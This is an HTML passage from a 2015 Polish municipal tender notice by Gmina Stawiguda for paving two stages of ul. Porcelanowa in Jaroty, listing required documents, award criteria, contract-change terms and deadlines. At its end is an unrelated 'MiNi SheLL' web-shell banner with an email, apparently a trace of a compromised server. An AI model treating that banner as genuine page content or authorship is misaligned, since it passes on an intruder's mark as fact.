<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	1. formularz ofertowy z wykorzystaniem wzoru - Załącznik nr 1; 2. pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów; 3. kserokopia dowodu wniesienia wadium; 4. Oświadczenie o podwykonawcach - załącznik nr  7B; 5. Wstępny harmonogram rzeczowo - finansowy - załącznik nr 8; 6. Kosztorys ofertowy uproszczony</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Rękojmia - 4</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonywania następujących zmian w umowie (na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych): 1. Zmiana umownego terminu zakończenia przedmiotu niniejszej Umowy jest możliwa w następujących przypadkach: a) w przypadku nowopowstałej infrastruktury na nieruchomościach objętych zamówieniem lub nie zinwentaryzowanej infrastruktury, o której Zamawiający nie posiadał wiedzy, która spowoduje kolizję nieprzewidzianą w opracowanej dokumentacji, b)wystąpienie okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności, c) wystąpienia wykopalisk uniemożliwiających wykonywanie robót, d) w przypadku zmian na terenach nieruchomości objętego zamówieniem, które mogą spowodować kolizję z wykonywaniem robót, e)  w przypadku nałożenia podczas realizacji robót przebudowy istniejącej infrastruktury przez dysponentów sieci (Zakład Energetyczny, TP SA, Zakładu Gazowego lub innych dysponentów sieci), f) okresowego zawieszenia robót, gdy: roboty zostaną rozpoczęte, a warunki atmosferyczne nie będą pozwalały na ich kontynuację zgodnie ze specyfikacjami, g) wystąpienia awarii technicznych nie zawinionych przez Wykonawcę , h) wystąpienia zmiany przedstawicieli stron odpowiedzialnych za realizację, przedłużenie terminu o 7 dni roboczych od dnia zgłoszenia którejkolwiek ze stron o zaistniałej sytuacji, i) w przypadku wystąpienia okoliczności niezależnych od Wykonawcy i Zamawiającego, skutkujących czasowym zawieszeniem realizacji umowy w tym: w wyniku działań osób trzecich, napotkanych nieprzewidzianych w dokumentacji projektowej przeszkód, j) w przypadku braku zgody właścicieli nieruchomości na wykonanie robót budowlanych, które zostały objęte przedmiotem zamówienia, k) w przypadku wystąpienia warunków atmosferycznych i warunków gruntowych, które ze względów obiektywnych będą  uniemożliwiały wykonanie robót budowlano - montażowych, zgodnie z normami techniczno-budowlanymi, l) wydłużającego się okresu przebudowania infrastruktury przez dysponenta Zakład Energetyczny, ł) w przypadku zmiany przebiegu trasy nawierzchni dróg w stosunku do projektowanych, m) w przypadku zmian na terenach nieruchomości przez które przechodzą nawierzchnie dróg, n) w przypadku wystąpienia okoliczności niezależnych od Wykonawcy i Zamawiającego, skutkujących czasowym zawieszeniem realizacji umowy w tym: w wyniku działań osób trzecich, napotkanych nieprzewidzianych w dokumentacji projektowej przeszkód, o) w przypadku wystąpienia warunków atmosferycznych, podniesienia poziomu lustra wody lub warunków gruntowych, które ze względów obiektywnych będą  uniemożliwiały wykonanie robót budowlano - montażowych, zgodnie z normami techniczno-budowlanymi, p) czasowego wstrzymania robót z przyczyn nie leżących po stronie Wykonawcy: 1.przez Zamawiającego 2.wskutek decyzji administracyjnej. O powyższych okolicznościach Wykonawca powiadomi Zamawiającego pisemnie.Terminu zakończenia może zostać przesunięty o czas zawieszenia robót lub niezbędny do wznowienia robót potwierdzony pisemnie przez kierownika budowy i Inspektora Nadzoru. Okres przesunięcia musi być zaakceptowany przez Zamawiającego. 2.  Zmiana podwykonawcy i podmiotu trzeciego. Wykonawca przedłoży Zamawiającemu dokumenty dotyczące podwykonawcy lub podmiotu trzeciego. Podwykonawca lub podmiot trzeci musi spełniać warunki określone w SIWZ, które jego tyczą. Zamawiający zaakceptuje lub odmówi zmiany podwykonawcy lub podmiotu trzeciego w ciągu 14 dni od dnia przedłożenia dokumentów. 3. Wystąpienia konieczności    wprowadzenia    zmian     spowodowanych  następującymi okolicznościami: a/rezygnacja przez Zamawiającego z realizacji części robót budowlanych. b/ nie wykonanie części zakresu robót przewidzianych w dokumentacji przez Wykonawcę. c/ podjęcia przez Radę Gminy w Stawigudzie uchwały zmniejszającej zakres wykonania lub wstrzymania wykonanie przedsięwzięcia  na podstawie art.231 ustawy z dnia 27 sierpnia 2009r. o finansach publicznych Dz.U z 2009r. Nr 157 poz.1240 z późn zm. d/  w przypadku stwierdzenia przy wykonywaniu wykopu i potwierdzenia przez inspektora nadzoru występowania warstw podbudowy nadających się do wykorzystania (wykonane zgodne z dokumentacją). 4. Zamawiający  pomniejszy lub zwiększy  wynagrodzenie należne wykonawcy o wartość robót, na podstawie  harmonogramu rzeczowo - finansowego (proporcjonalnie do zakresu robót) w przypadku zajścia okoliczności ust.3. spisując stosowny protokół konieczności, który musi zostać zaakceptowany przez obie strony. 5. Zamawiający zmieni wynagrodzenie wykonawcy za roboty budowlane w przypadku zmiany stawek podatku VAT zaistniałej podczas obowiązywania zawartej umowy, na skutek powszechnie wprowadzonej zmiany obowiązujących stawek podatku od towarów i usług. 6. W przypadku wystąpienia przyczyn, o których mowa w ust. 1,3- 5 Strony uzgodnią powyższe zmiany zawartej  umowy w formie aneksu.  7. W przypadku wystąpienia przyczyn, o których mowa w ust. 2 nie będzie konieczności zmiany umowy w formie aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.stawiguda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek Wykonawcy złożony do siedziby Zamawiającego: Urząd Gminy Stawiguda ul. Olsztyńska 10, 11-034 Stawiguda. Koszt SIWZ 15 zł plus koszt przesyłki..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2015 godzina 11:45, miejsce: Urząd Gminy Stawiguda ul. Olsztyńska 10 11-034 Stawiguda w pokoju nr 18 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ I - Budowa nawierzchni ul. Porcelanowej - ETAP I..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. ETAP 1 - odcinek drogi długości 135 m począwszy od punktu E prim (od miejsca, w którym kończy się  istniejąca droga). Roboty budowlane obejmują budowę drogi w miejscowości Jaroty na działce 291/15 oznaczonej na planie sytuacyjnym literami E prim-G. ETAP 1 - odcinek drogi długości 135 m począwszy od punktu E prim (od miejsca, w którym kończy się  istniejąca droga). Zakres zadania nie obejmuje wykonania chodników i oświetlenia. Nawierzchnia  przewidziana na ruch kategorii KR-1 z kostki betonowej brukowej szarej gr. 8 cm na podsypce cementowo - piaskowej  i podbudowie z kruszywa łamanego stabilizowanego mechanicznie. Odwodnienie nawierzchni dróg poprzez spadki poprzeczne i podłużne do wpustów kanalizacji deszczowej w drogach. Główny rurociąg kanalizacji deszczowej został już wykonany. W ramach niniejszego zadania należy wykonać odprowadzenie wód deszczowych do istniejącego rurociągu poprzez wpusty uliczne żeliwne deszczowe z osadnikami zlokalizowane w jezdni ulicy. 2. Zakres, sposób wykonania i szczegółowy opis przedmiotu zamówienia wynikający z art. 31 ustawy Pzp stanowi dokumentacja projektowa na wykonanie robót budowlanych, na którą składa się: 2.1. Dokumentacja projektowa budowy dróg  - stanowiąca załącznik Nr 1 do pozwolenia na budowę   Sta/155/2007 z dnia 24.09.2007r. wydanego przez Starostwo Powiatowe w Olsztynie  - [załącznik nr  10  do siwz], który to dokument jest integralną częścią SIWZ oraz 2.2. specyfikacje techniczne wykonania i odbioru robót  [załącznik nr 11 do siwz], który to dokument jest integralną częścią siwz, a także 2.3. przedmiar robót - element pomocniczy - [załącznik nr 12 do SIWZ]. Zamawiający zastrzega, że w przypadku stwierdzenia przy wykonywaniu wykopu i potwierdzenia przez inspektora nadzoru występowania warstw podbudowy nadających się do wykorzystania, roboty te zostaną odpowiednio zdjęte z zakresu wykonania Wykonawcy, a wynagrodzenie Wykonawcy zostanie odpowiednio pomniejszone..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.20-6, 45.23.24.40-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Rękojmia - 4</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ II- Budowa nawierzchni ul. Porcelanowej - ETAP II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3. Roboty budowlane obejmują budowę drogi w miejscowości Jaroty na działce 291/15 oznaczonej na planie sytuacyjnym literami E prim-G. ETAP II - pozostała część drogi z placem manewrowym w formie ronda. Zakres zadania nie obejmuje wykonania chodników i oświetlenia. Nawierzchnia  przewidziana na ruch kategorii KR-1 z kostki betonowej brukowej szarej gr. 8 cm na podsypce cementowo - piaskowej  i podbudowie z kruszywa łamanego stabilizowanego mechanicznie. Odwodnienie nawierzchni dróg poprzez spadki poprzeczne i podłużne do wpustów kanalizacji deszczowej w drogach. Główny rurociąg kanalizacji deszczowej został już wykonany. W ramach niniejszego zadania należy wykonać odprowadzenie wód deszczowych do istniejącego rurociągu poprzez wpusty uliczne żeliwne deszczowe z osadnikami zlokalizowane w jezdni ulicy.4. Zakres, sposób wykonania i szczegółowy opis przedmiotu zamówienia wynikający z art. 31 ustawy Pzp stanowi dokumentacja projektowa na wykonanie robót budowlanych, na którą składa się: 4.1. Dokumentacja projektowa budowy dróg  - stanowiąca załącznik Nr 1 do pozwolenia na budowę   Sta/155/2007 z dnia 24.09.2007r. wydanego przez Starostwo Powiatowe w Olsztynie  - [załącznik nr  10  do siwz], który to dokument jest integralną częścią SIWZ oraz 4.2. specyfikacje techniczne wykonania i odbioru robót  [załącznik nr 11 do siwz], który to dokument jest integralną częścią siwz, a także 4.3. przedmiar robót - element pomocniczy - [załącznik nr 12 do SIWZ]. Zamawiający zastrzega, że w przypadku stwierdzenia przy wykonywaniu wykopu i potwierdzenia przez inspektora nadzoru występowania warstw podbudowy nadających się do wykorzystania, roboty te zostaną odpowiednio zdjęte z zakresu wykonania Wykonawcy, a wynagrodzenie Wykonawcy zostanie odpowiednio pomniejszone..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.20-6, 45.23.24.40-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Rękojmia - 4</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com